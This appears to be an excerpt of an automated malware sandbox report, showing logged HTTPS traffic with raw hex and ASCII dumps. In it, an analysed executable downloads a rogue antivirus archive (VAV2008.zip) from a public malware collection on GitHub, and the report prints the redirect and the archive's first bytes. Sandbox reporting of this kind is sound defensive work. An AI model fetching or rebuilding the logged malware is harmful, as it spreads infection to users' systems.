                                                                                                                                                            Data Ascii: \s*0f{5!Nn)\<;h7O_H_g&7]\;rDWT?WcY6yC!vRF)j!8~~'%d.z"p)|i=1%DtpKyI=A"jPPTlh,nV7Ln1&M}AB-rg2_"a]EU9Ta|"@L
                                                                                                                                                            2022-09-29 12:45:28 UTC36976INData Raw: c0 15 c4 4d 99 16 89 ec 53 dc 33 9a 8f f8 bf 8b 64 c0 fc 75 d8 d9 40 eb 89 a4 64 f1 c6 a4 89 a9 08 f8 37 c0 36 bf 10 a5 4c fc a3 65 2f 74 d4 03 93 65 11 fc 17 9e f1 80 58 a6 92 24 82 52 82 6b 70 b5 15 ee 39 02 ad e5 b8 c5 00 f6 ac 05 41 2d b5 93 6c 5a a8 ed 4d ab 1b 8d 7a 84 03 98 ca ec cc 48 ad f9 b5 64 4a f0 08 94 97 c9 10 fd b2 fd 3d 9d 90 df e4 0e 89 55 16 ba 27 2e d5 47 d6 e4 ad 1a 7d 18 e4 15 cc 78 68 f5 c7 39 a3 23 de 05 d9 58 d0 ba 36 2a 04 71 bb 46 86 73 37 10 c1 f8 b3 d4 2a 44 15 08 6d fb c3 f1 93 40 f4 29 c8 48 d6 05 8a 63 c2 b1 08 a5 3e 06 8d ce 8d 8e 3d ad 36 60 04 3e 2e d7 72 9c 85 56 55 58 09 2d da 23 09 77 0e f6 54 70 eb ea 29 bd 57 41 38 bd 47 82 9f db 2d 49 a3 f4 8b e8 e2 fa 99 12 7c 29 4d 14 4c 7a 11 52 c2 39 75 c0 19 af 5d 9f 6e b3 06
                                                                                                                                                            Data Ascii: MS3du@d76Le/teX$Rkp9A-lZMzHdJ=U'.G}xh9#X6*qFs7*Dm@)Hc>=6`>.rVUX-#wTp)WA8G-I|)MLzR9u]n
                                                                                                                                                            2022-09-29 12:45:28 UTC36992INData Raw: ef ea c6 92 6f 24 b9 50 f2 b6 3e ab f7 de 87 92 7e b9 6a 1b 2f f3 c4 a1 93 c4 67 d4 3f 7b 8c aa e0 01 39 81 20 8e 4d de ef 3c e6 34 84 36 1f c1 6a 91 ca 6d 6f cc b0 13 3e f9 6b 9f 27 be cb 0b d0 ce 97 0d af 27 20 d0 d1 df 8d db 1e 7a 6b d5 fe 39 5f 71 f0 5b a0 f1 9c eb f1 8f bb bd 05 43 55 90 fe 61 24 db ef a4 e0 10 38 d1 63 5c 0d d6 8c eb cc 66 16 fa 37 cb 09 e2 9a 1d 88 8d 7c 3d ab 0e 32 4d 07 f9 23 19 1c 7e b8 54 99 5c ee 3c 88 0c ed 48 72 64 d7 89 87 86 8c ae b9 c0 43 69 97 46 1b 5a 18 0d 5e 12 17 49 8a 5e 0b 82 8c 21 16 d6 4a 1f 9e 8c 9f 80 c0 ca 89 b0 0e 5e 4e ac 29 f6 77 07 87 6a 55 d8 ec a4 0e 5e 4b 2e ca 5c 84 57 66 a1 79 fd bf e4 e5 3d ff dc 9a d4 d2 c9 3f 26 a5 42 42 05 cd e9 fe 11 21 7f 01 8d 12 ce 98 b6 1e 39 0f b7 b8 39 21 03 66 4c 66 74 bb
                                                                                                                                                            Data Ascii: o$P>~j/g?{9 M<46jmo>k'' zk9_q[CUa$8c\f7|=2M#~T\<HrdCiFZ^I^!J^N)wjU^K.\Wfy=?&BB!99!fLft
                                                                                                                                                            2022-09-29 12:45:28 UTC37008INData Raw: a1 92 39 33 0f 3c 07 91 a5 9d 49 1f 1d 0b 74 26 89 4e a7 2e d5 90 7c 53 66 e2 90 f1 27 9c 2b 61 32 6b 1f 94 0a 5a 3a 75 b9 dc 87 8d 9c 15 b8 f4 bc 6c fe e6 1d ca d0 ab 4f d0 fc a1 67 6d 0a c2 09 bb a6 98 79 d2 29 92 d5 25 55 09 af 9f 11 e7 67 d7 b4 b5 80 98 47 be 7c f9 bf 34 a3 87 79 05 62 15 e4 9a 5f 63 5d a5 5e 4e 4c 01 b2 c4 d1 96 8e 8d aa e0 c6 8d 90 98 80 11 56 dc 87 35 b1 4a f9 d3 61 4c 27 29 78 e3 e2 0c b2 9a 90 73 e5 26 b5 b9 c1 20 7d 7b 92 5a 68 bf 44 be 39 9b bd 74 9c 26 39 1e fb b1 c1 9c 14 63 60 48 81 21 65 3a cf c6 51 85 0a 96 15 ee 23 83 a2 27 b3 e2 d7 9d ae b3 bf ca 38 2f bf 63 86 62 7d 06 1a 0e fa da cf 1b 9a f7 39 b1 f8 a4 e9 73 b6 8e ce 34 82 c3 61 3f 91 cd b0 53 99 5e 9f e9 19 8c 9b 49 d0 5a 2b e5 b3 0a 1b 95 1b a2 ee df 8e af f2 b9 3b
                                                                                                                                                            Data Ascii: 93<It&N.|Sf'+a2kZ:ulOgmy)%UgG|4yb_c]^NLV5JaL')xs& }{ZhD9t&9c`H!e:Q#'8/cb}9s4a?S^IZ+;
                                                                                                                                                            2022-09-29 12:45:28 UTC37024INData Raw: 72 33 24 55 b2 4d ee c3 d5 59 03 37 f1 bd 37 cb 85 8f 7d a4 19 ed 97 a5 6e 32 78 bb a0 7b 80 08 f9 a8 5b 95 2e 3e 84 aa b1 19 b4 2c 8d 00 0a 87 9b f6 bc 6c 52 76 ff ba 7a 24 59 74 ed 72 e6 9b d4 d0 40 ce d1 1d 8b 84 e5 29 13 d9 ef 25 6e 3c 95 6c 60 05 b1 f6 ca 15 47 4e d4 2b 17 ec 01 a0 b9 70 97 8b 9a 6a 56 50 a4 7a 91 12 89 69 eb 3b 68 38 00 c9 ec e3 73 3b 4f b8 5a 2a 6e 20 e1 9b 7a 89 bc 3b 5e 86 05 86 37 08 6b 4a 80 dd ec 26 43 bf 42 ab b9 55 bd 0d 13 64 87 64 05 62 c1 39 b0 41 34 85 cc 90 7c ce 16 ef a0 5f 7e 53 63 0f f3 60 b9 3a 17 93 b1 1c f1 b0 41 44 06 08 21 42 a6 3e be 6c d5 2e 39 50 4f e7 5e ed b6 bc 20 e1 2b b3 81 6c 5c 01 ba a2 0d 47 72 6b 2e 9b 1d e7 1d af 92 b6 0c 0d a8 36 f9 66 f2 a8 e3 e3 7a 14 da f8 19 4d dc 6d 1a 5d c7 89 89 a0 11 f7 6f
                                                                                                                                                            Data Ascii: r3$UMY77}n2x{[.>,lRvz$Ytr@)%n<l`GN+pjVPzi;h8s;OZ*n z;^7kJ&CBUddb9A4|_~Sc`:AD!B>l.9PO^ +l\Grk.6fzMm]o
                                                                                                                                                            2022-09-29 12:45:28 UTC37040INData Raw: 51 4d c2 72 0e 94 7b 34 15 1f 87 bd 9d 84 6f 60 f3 ea de fd 1c ac 72 fd f0 62 2b 6d 9f 10 a3 31 ee a1 67 84 cd bb 0e 7a b2 2c 80 30 fd f4 28 57 43 43 8d f4 0c eb e1 ad 5a 03 a1 7d 57 73 19 e1 88 93 89 ab 10 cd 9e 85 2e 6a 88 3c 3a 59 b9 6d 56 d9 1b 57 77 16 5d 8f 38 25 22 49 dc 20 73 bd ab bb 5e 00 cc a8 55 5e c3 0c e1 53 67 f2 47 f0 e4 a9 0d 85 36 32 c4 25 f6 99 96 b3 eb 33 c8 c0 29 c2 3d 67 65 ac 29 29 04 c5 03 52 dc 40 0e a8 4c d7 b0 4a 53 ce e0 40 00 79 2c ab b1 ef 1e 3c 96 4d f1 d3 43 d5 ce a7 cf bc 4b 2f 02 64 ec ef ea 36 cb 31 92 53 97 df 1f 9c 2d 1d 0e 56 1e 89 38 4e c0 93 3c 32 14 ab a4 e3 f2 69 7a 72 d6 47 a6 b5 da ac 3f d4 6d 31 ef d4 4d 97 9d 65 8d 03 70 64 5f 6e 95 69 0a 17 c4 64 2d f6 f2 1e 24 d6 bc 30 cb b2 8c dd b1 97 48 f5 de 4e 85 ac f3
                                                                                                                                                            Data Ascii: QMr{4o`rb+m1gz,0(WCCZ}Ws.j<:YmVWw]8%"I s^U^SgG62%3)=ge))R@LJS@y,<MCK/d61S-V8N<2izrG?m1Mepd_nid-$0HN
                                                                                                                                                            2022-09-29 12:45:28 UTC37056INData Raw: 07 8c d9 a0 fa da df a1 eb 25 73 30 c1 3a 33 95 73 2e bd 0b 1e 69 6f c2 f1 47 d1 33 5e 9f 92 f0 8f 4d 70 f0 57 a5 4c 7f 64 22 52 c9 83 9a b9 4f 37 dd 76 f1 f9 28 87 8c 9d 0d 43 9f 9e a9 22 24 cc 19 51 c0 f7 97 c3 b1 d7 f8 e0 e8 5c 63 a9 04 4f 93 5a ad 44 d4 52 38 3e 0f 46 93 8c 64 1d c4 15 a7 1e 8a bd 83 41 6d 63 c3 d4 9e 07 a9 6e 6c 04 c9 b1 9b d1 40 f0 a5 22 77 99 9d b3 7c be c7 9d 16 32 c3 83 11 5b cc 74 ac 22 c7 1d 20 07 61 ac 08 6a b0 17 cc a8 1a 5c 4b 24 58 96 b3 34 3e 74 02 6a 78 e2 95 51 0a 92 1f d5 97 b1 cc 00 3f 2a f0 b4 24 bf 1f 71 33 59 da 19 01 a6 03 21 bd 2c 15 02 f4 c8 31 f3 24 04 54 f5 78 fa d8 84 d8 d5 48 e2 80 8d 3d 24 11 e1 a0 ff 11 45 ce 2e a2 83 6f 00 0b 27 3a 3c fe 52 d2 94 7b 3d 59 97 a7 52 ae 98 7f 7d d7 81 5b 1e ec 82 1d c9 db cb
                                                                                                                                                            Data Ascii: %s0:3s.ioG3^MpWLd"RO7v(C"$Q\cOZDR8>FdAmcnl@"w|2[t" aj\K$X4>tjxQ?*$q3Y!,1$TxH=$E.o':<R{=YR}[
                                                                                                                                                            2022-09-29 12:45:28 UTC37072INData Raw: f2 d9 9a 7c 3f 4f 51 07 cb cd e0 f5 fd bf b9 8d fc 4c a1 eb 48 6b 6c 86 96 8d 19 ff d5 ed 23 bc 9b 5e c9 d5 09 26 ac a9 42 c6 81 d2 7d b7 dc 17 96 89 33 e5 e1 7a ee a9 bd 15 36 02 79 7a 02 ae 9f 0e 4a 63 0f 47 a1 71 5a 26 39 d2 e6 76 46 23 51 b8 ff 9e 24 77 5b 68 01 e1 c3 8c d7 f0 74 a6 e7 ee 1b 15 f4 a3 66 5e 5c 00 ff 68 c5 e1 86 af 9a 18 cf 30 f0 db 5a fa 97 42 22 9a 9b dd f0 9a 2c 41 d0 5b a1 a2 6a 5f 2c 7c 92 04 6d 08 91 c2 cd 37 eb 22 a3 09 d2 bf d8 42 e8 3b 3d 66 ee 3e 73 58 be 3b ee 05 8a c5 b3 9e 19 4c 46 72 af 94 60 67 1b e5 d8 b6 4a d4 39 c8 3d b3 62 4c a3 27 f7 b3 a6 f5 0e e4 90 c2 f1 36 a8 14 5b 56 e8 9c 99 33 23 85 3e 05 90 98 e4 8a e5 de f0 02 e5 85 81 2d e9 ba ac d8 9e ec 72 b7 9c da cb 7e 8c 2d 93 ec de 8c e1 6d 81 ee e4 36 12 ae d3 e4 ea
                                                                                                                                                            Data Ascii: |?OQLHkl#^&B}3z6yzJcGqZ&9vF#Q$w[htf^\h0ZB",A[j_,|m7"B;=f>sX;LFr`gJ9=bL'6[V3#>-r~-m6
                                                                                                                                                            2022-09-29 12:45:28 UTC37088INData Raw: cb 94 d1 d3 2e cf 8c cf b7 ef ee 16 65 34 bf 87 25 76 18 b3 13 2b d5 aa c5 a6 aa 23 56 1f f7 05 2d e0 43 dd 90 4a 0d 4c 02 b1 29 fd be 9c ce 37 77 9d 3a 47 73 14 bf 11 da f7 4d ba 5d f2 11 32 b5 89 24 bf e0 2c c2 8d be 74 52 c8 bc 07 98 fe be 75 c5 55 59 e5 ea a1 e2 11 fc aa 5f 75 39 6e 8f 5e 85 fe 4b 14 6a 9b 41 f8 3a a6 57 e6 51 28 3f c4 8c 5b 56 c9 c8 5d 85 14 47 de 11 5f ce 3d 9a eb 9b 5e fa 6d 79 65 18 4a 11 b2 7d 77 c7 f6 b3 2c e7 64 21 65 db 90 48 e3 e1 8c d2 7e 22 f8 80 1a 34 01 c1 92 05 60 76 e9 01 22 c6 9d 6e f3 46 4b 23 da 94 22 e6 f0 17 9d e5 e9 fd e8 bd 1b 4c 36 b8 e5 42 10 11 81 9d 62 78 18 7b b6 1c 33 d9 ed c9 41 dd b0 17 d6 53 58 6d a8 45 c8 a6 2d 34 28 06 e2 73 00 2c c6 bb 64 35 66 d0 83 22 fa 82 a7 87 6b 65 69 1d a4 fa 94 35 37 be 74 e9
                                                                                                                                                            Data Ascii: .e4%v+#V-CJL)7w:GsM]2$,tRuUY_u9n^KjA:WQ(?[V]G_=^myeJ}w,d!eH~"4`v"nFK#"L6Bbx{3ASXmE-4(s,d5f"kei57t
                                                                                                                                                            2022-09-29 12:45:28 UTC37104INData Raw: 3f 1b e8 16 33 ff f8 39 51 aa 0a 7f c9 37 07 ed f6 73 19 cf 27 cb 09 dd 95 ae cb 59 eb fb c0 77 c7 34 12 38 b2 15 5c eb f0 57 ba d7 d6 5e 83 cb f8 5c 32 68 53 ca fc 42 51 a0 ec d7 93 a6 e3 30 fc fa c5 0c 91 5d 32 ef 96 02 e3 1a d5 26 2d 10 9b f9 c4 43 af e5 69 1b 7d f4 ef 21 9f ab f9 fb 01 6f 36 69 30 4b c1 07 aa 62 35 d9 05 a8 f3 7e 85 34 84 c4 4c 5b a2 fc a9 ab a9 58 39 fe 7b b1 0a 2c e8 c9 fc 3e 9c c8 39 74 83 e3 d9 d9 5e 1a 29 e1 2e f7 7f 98 18 0a 52 0b b3 78 a0 7e 81 20 ab e3 8d 8d 5f a2 58 fd 74 24 f3 cf e0 7d 34 10 0b 4a 10 2f 88 53 9a 0a 82 0e c0 71 2e 30 7b 52 0d 51 ef e8 53 69 a4 18 ea 80 c6 8a 62 44 32 f3 9c 1c 8c 6e 72 b3 f6 e4 d9 03 a1 f5 d6 3c 66 37 8c 73 23 70 f9 46 f8 c5 42 d2 23 0b 4a 48 ce 1a 21 8e 68 e7 29 44 b8 f6 ff d5 6d 54 af 9c 6d
                                                                                                                                                            Data Ascii: ?39Q7s'Yw48\W^\2hSBQ0]2&-Ci}!o6i0Kb5~4L[X9{,>9t^).Rx~ _Xt$}4J/Sq.0{RQSibD2nr<f7s#pFB#JH!h)DmTm
                                                                                                                                                            2022-09-29 12:45:28 UTC37120INData Raw: 51 4b 66 97 7c 8a 3f 06 f2 a2 f5 c8 0d 75 e9 07 3e d6 f4 ec ac a6 99 fd ce 14 26 f8 89 d8 1a 96 32 58 bc cc 03 d0 3d ef a4 0d 45 5d 4c 44 a2 57 91 a6 3d 96 72 5f f6 15 0f 8a 4d bc af 86 3d f5 5d fd 52 5b d7 e2 5a 85 f2 37 f4 a3 ce a9 22 6c 4c 8f 57 c9 5f 13 c6 e2 52 79 6f 8a 17 ec 3d f1 af 88 59 02 1d a8 60 50 64 57 4a f2 f3 44 ae 60 db 6d 96 d3 3d ce 81 a4 91 f2 19 f1 00 44 58 0e ca 10 5b 62 6b e5 f7 94 1a c8 d0 42 0a 2b c1 22 1d 1d fa a7 6a c9 d7 de 50 76 1e 55 83 c8 a4 fa c0 08 fd 99 ea ac 8f be 65 d9 ec e3 c9 f3 ce ae b1 22 a5 0e b0 62 f2 9d 21 6f b6 0d 68 a1 25 48 dc 7b 92 b5 6c 85 20 99 b8 81 6a 4a 0d 56 ed df d5 fc 8d 61 47 df 64 96 ec fe 35 e0 89 6c 2e 77 b5 f8 2f aa 22 16 4e fe 1e 0e b9 d5 99 19 d9 95 b1 da 74 ef d8 89 0d bc a8 ff 1c f1 72 d3 71
                                                                                                                                                            Data Ascii: QKf|?u>&2X=E]LDW=r_M=]R[Z7"lLW_Ryo=Y`PdWJD`m=DX[bkB+"jPvUe"b!oh%H{l jJVaGd5l.w/"Ntrq
                                                                                                                                                            2022-09-29 12:45:28 UTC37136INData Raw: f7 9a 39 ce 09 7c 17 15 9a 25 b0 d0 4c 83 dd 3e 88 c7 5d 26 f4 3d 6b f2 c2 46 98 37 f4 11 52 77 c3 2f ca 76 8a 79 49 e8 df 34 79 2f be 18 24 f8 1f 09 d3 53 64 3a 88 8c 84 de b2 5c fa db 66 18 98 83 42 ba 6a 3e 7a ca 88 0c 6a be 08 2b 48 19 c7 20 32 51 1f 4a c4 73 9b 6f d3 a3 1c 7c 3b 2e 3e 12 1b 30 b2 a3 ce ab 42 eb b3 46 e2 5d 31 ed ca 3b 05 ee 21 12 0b f9 e3 70 dc 83 fb 7c 77 6e bf ae b7 78 3b 73 74 cd d7 18 25 f5 3c 86 c8 32 85 17 84 40 28 c7 9a 14 2e ad a6 7f ef be fe d0 0b ec ab d7 8c 92 93 89 72 e4 a6 9b a6 2e 5b 4b 57 8d 73 30 ee c1 7d 80 d6 1f bc 16 f3 54 2c 0c 54 d3 a5 d3 7f 3b 25 ec ec 84 3f d8 67 9f db ec 70 fa 87 c3 b2 9c 78 0c b7 66 5a fd 23 a4 8c 77 0e c7 49 77 bf ee cc a4 f3 a3 b2 ff 62 3e 62 fa 09 34 cc cd 3a 49 99 e7 06 c7 4f 65 d5 bc bc
                                                                                                                                                            Data Ascii: 9|%L>]&=kF7Rw/vyI4y/$Sd:\fBj>zj+H 2QJso|;.>0BF]1;!p|wnx;st%<2@(.r.[KWs0}T,T;%?gpxfZ#wIwb>b4:IOe
                                                                                                                                                            2022-09-29 12:45:28 UTC37152INData Raw: 05 03 a8 f4 c5 3d 2d 32 36 b6 2b 8a 67 05 ce 63 1b d6 39 8d 95 ab 90 ce f7 22 64 3f 60 61 05 00 39 3b f4 7c fe 48 a9 b7 fd 45 62 59 35 16 97 f9 35 aa fd d6 5e 6a 6f 5e ae 32 ed e7 74 a5 78 dd c9 e5 40 5a f3 97 44 85 d1 48 aa de d1 9b b8 97 f6 de e9 0e 42 70 ef 73 07 fd 2c bd fc 5e 9f 79 d2 35 df fd b5 7f d3 1a 67 e1 ab b7 66 3a c1 f9 17 c1 3d 45 ef 25 bb a2 99 86 8d 43 ec aa 43 82 11 21 80 79 16 72 a5 3b 08 de 26 d1 eb 17 6b d4 a6 b9 38 d9 83 26 41 17 40 46 a1 93 c7 f7 0b 9b 84 d9 c3 b6 9c 7a f9 6d 7e 0a c2 6c c2 98 7a be 85 71 5e f4 04 9d 41 84 25 54 2e cb db 0d 44 4c 02 43 c7 83 14 1d 8b e1 bb 03 4b 39 37 e2 e1 cb e9 74 aa 3c 48 47 05 17 2d 00 f1 27 9c 7d b5 4d 58 b3 bb e0 de 0f 18 9a 31 80 7f bd 72 fd 4b 2f fb eb c4 30 80 97 9f 6d 54 c8 62 93 f4 86 56
                                                                                                                                                            Data Ascii: =-26+gc9"d?`a9;|HEbY55^jo^2tx@ZDHBps,^y5gf:=E%CC!yr;&k8&A@Fzm~lzq^A%T.DLCK97t<HG-'}MX1rK/0mTbV
                                                                                                                                                            2022-09-29 12:45:28 UTC37168INData Raw: 9e 22 41 ff 2f 9f 07 ce f2 42 e0 3d cf 71 d8 4a 46 33 89 74 0e 43 da 8c e9 cf b5 a0 60 aa 34 ff 89 30 fd d6 92 b6 3a a5 62 dc c3 c0 bf e4 f3 61 80 67 ef 01 ac 6f be 44 50 36 24 f7 2e df 50 0e e4 35 c0 6c 78 51 2c fc 44 10 e8 8c 0b 55 04 88 c5 ff ff 6a db 4c 37 8c 47 af ce 42 3d 9a 78 e6 bc ec 6e 75 f6 71 67 8b a0 31 d5 33 35 9c d6 43 a5 fd fe c1 61 4b 44 90 89 f7 89 b4 84 cf 2a 94 4b ff 5e a2 15 53 18 e7 44 8b 1c 9b 8b a8 f2 be 66 c6 36 b3 30 79 61 0e 00 13 8e 88 c8 d6 72 cf 88 39 b8 1f ec ce bd 72 7e 21 61 13 36 74 02 2a ac a3 b9 7d e4 d5 57 0e 20 81 52 3e 52 f5 14 d1 64 8c 12 62 62 97 1e d0 5f c8 e4 34 ac b1 ef 2a aa 09 58 e4 8c 8b 08 39 6d e3 cb d7 d1 cb 93 46 3e 32 d9 23 73 3c d6 6e d0 e9 95 f6 87 32 e3 f2 56 9c 5b c0 49 ce 67 ae ce 84 48 0f 7e 46 e3
                                                                                                                                                            Data Ascii: "A/B=qJF3tC`40:bagoDP6$.P5lxQ,DUjL7GB=xnuqg135CaKD*K^SDf60yar9r~!a6t*}W R>Rdbb_4*X9mF>2#s<n2V[IgH~F
                                                                                                                                                            2022-09-29 12:45:28 UTC37184INData Raw: 3e 5d 2b 7a 50 e1 48 80 70 69 6c e9 22 98 eb d1 e8 8c e3 c4 86 bd 9e 99 a0 50 f3 43 46 de 7a 64 0f 97 3b da 3a 38 84 ac 54 fc d7 6c 91 89 06 6f c2 3c c5 ef 5c 0f 8a 15 c6 b9 18 eb 32 3c 79 65 16 5e 19 ba fb 61 66 83 85 c9 04 ad e7 a5 91 64 91 d4 43 3e d2 5f 8b e3 e0 69 76 f8 3d f8 15 88 90 50 22 b7 a1 55 0d ca ee 19 7d 2c ce 38 2b c7 1e 30 78 0f 4b f2 47 e3 08 0a 06 d5 8b 33 9b 95 04 97 22 4d cd 06 36 e1 8c 92 d4 a4 5f 38 05 60 da 54 c3 f2 d8 2c b0 ea 07 5d 71 d2 57 22 13 b9 ee 06 d3 67 28 ae 3a 09 6f c2 ba ac 22 29 56 e1 0e 45 4a c7 4c 2a b2 79 e0 56 1f d9 d7 5a a7 6a 9a 02 bd 8c 88 bc b2 56 f9 ce c6 4d 82 ab 8c 3b 56 e2 4d 66 a6 82 6c 26 82 fe c0 38 ca a0 35 8f 61 df 02 45 cc 6d 86 6b 0a 89 5b ba 07 89 ce b9 3c 98 74 5c 7b 24 f5 13 49 be 18 c1 c9 6f 10
                                                                                                                                                            Data Ascii: >]+zPHpil"PCFzd;:8Tlo<\2<ye^afdC>_iv=P"U},8+0xKG3"M6_8`T,]qW"g(:o")VEJL*yVZjVM;VMfl&85aEmk[<t\{$Io
                                                                                                                                                            2022-09-29 12:45:28 UTC37200INData Raw: c9 bf bf 99 23 e3 a3 18 37 8e b5 a7 6a ad 13 06 e3 b6 27 19 ad 76 8b ae 8a 38 1b 15 a5 2d 29 32 87 a3 b5 cd 46 30 dd 24 d9 b8 35 4f 87 81 2d 4e 3e f4 6f 56 2e 9e 9f a7 55 1e 4a ba 68 28 1b 60 9f ea dd b9 20 74 fe af 6b ac 68 67 17 ca ac 11 5c bb 60 f0 45 ec 12 78 23 c9 28 67 4b 27 2d 95 13 dc 17 5d 48 0b 0e 49 4c ca 57 6d 1d 2d 07 76 a6 b4 19 41 b3 2a 6f 3f b0 be af 0d 5f e2 f5 91 05 42 63 5a 87 27 4b ad 1f 53 28 4a 87 4e 88 97 cd f8 b8 43 3a fe 16 d6 09 90 8a 95 43 7c 71 ee c3 db 8c 9d 3e ae 9c f7 25 29 99 13 59 86 33 41 4d 9c d5 f9 d9 81 1f c2 de 06 e3 03 e9 ed 84 5f 97 44 34 4d a0 22 25 e7 70 9e f7 8e 38 8b 8c e0 6a ac 90 5b 45 43 9f 14 b9 85 0b fe a7 6b 83 4f d2 ea 1e b3 50 3b 86 f5 d8 d2 17 5c ba 1a 9a 8d 7e a9 95 e3 51 9d 97 62 1d 72 60 90 36 7c e8
                                                                                                                                                            Data Ascii: #7j'v8-)2F0$5O-N>oV.UJh(` tkhg\`Ex#(gK'-]HILWm-vA*o?_BcZ'KS(JNC:C|q>%)Y3AM_D4M"%p8j[ECkOP;\~Qbr`6|


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            134192.168.2.649775140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:30 UTC37209OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/VAV2008.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            135140.82.121.4443192.168.2.649775C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:31 UTC37209INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:31 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/VAV2008.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:45:31 UTC37209INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            136192.168.2.649776185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:31 UTC37211OUTGET /Endermanch/MalwareDatabase/master/rogues/VAV2008.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            137185.199.110.133443192.168.2.649776C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:31 UTC37211INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 784070
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "5601906f462292c534f39537ca64d8cda4306ae676428837f668f0e7370b064a"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: F256:3F37:F623C5:105CF59:6335936B
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:31 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6937-MXP
                                                                                                                                                            X-Cache: MISS
                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                            X-Timer: S1664455531.296014,VS0,VE196
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: 923ccf6b3bdd50d9bbead27956c5b622a439e477
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:50:31 GMT
                                                                                                                                                            Source-Age: 0
                                                                                                                                                            2022-09-29 12:45:31 UTC37212INData Raw: 50 4b 03 04 33 00 01 00 63 00 73 14 a7 3a 00 00 00 00 fe f5 0b 00 73 0b 0c 00 16 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 56 41 56 32 30 30 38 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 2c e5 a7 6a 4d 02 19 ad e4 db 0e 60 f4 6e 12 95 d3 5b c6 37 07 fe 19 c6 cd ed c5 04 33 33 cc 8b 59 b9 2d 06 87 fe ef 3f 78 19 73 6f b0 58 5f 9b 21 73 23 37 6c 4e bc 8a 2a 2e 5a 98 e7 35 af cb 0d 36 49 ad 79 e7 76 4f d1 96 71 3e dd 31 11 19 b5 e2 b9 3e eb 4a fe 8f 12 67 d4 dd 67 1f e7 5b 88 8d b1 6f 1a e5 98 1f a4 62 72 90 26 00 0e 23 11 04 d9 27 6b 03 55 90 a9 62 bc a9 56 7e 57 9d 32 c3 0c ad 21 ca 9c bc 78 2c 09 c1 ff dd 21 1c af 38 bc 08 35 2c 7f a0 be fb 67 0f 77 5b ab 29 fb 3e c7 b3 02 35 98 0e 2d 5d 33 2b e1 8c fa f4 1b 04 2e 38 43 0b 17 be a4 b0 ac 12 f4 53 04 be
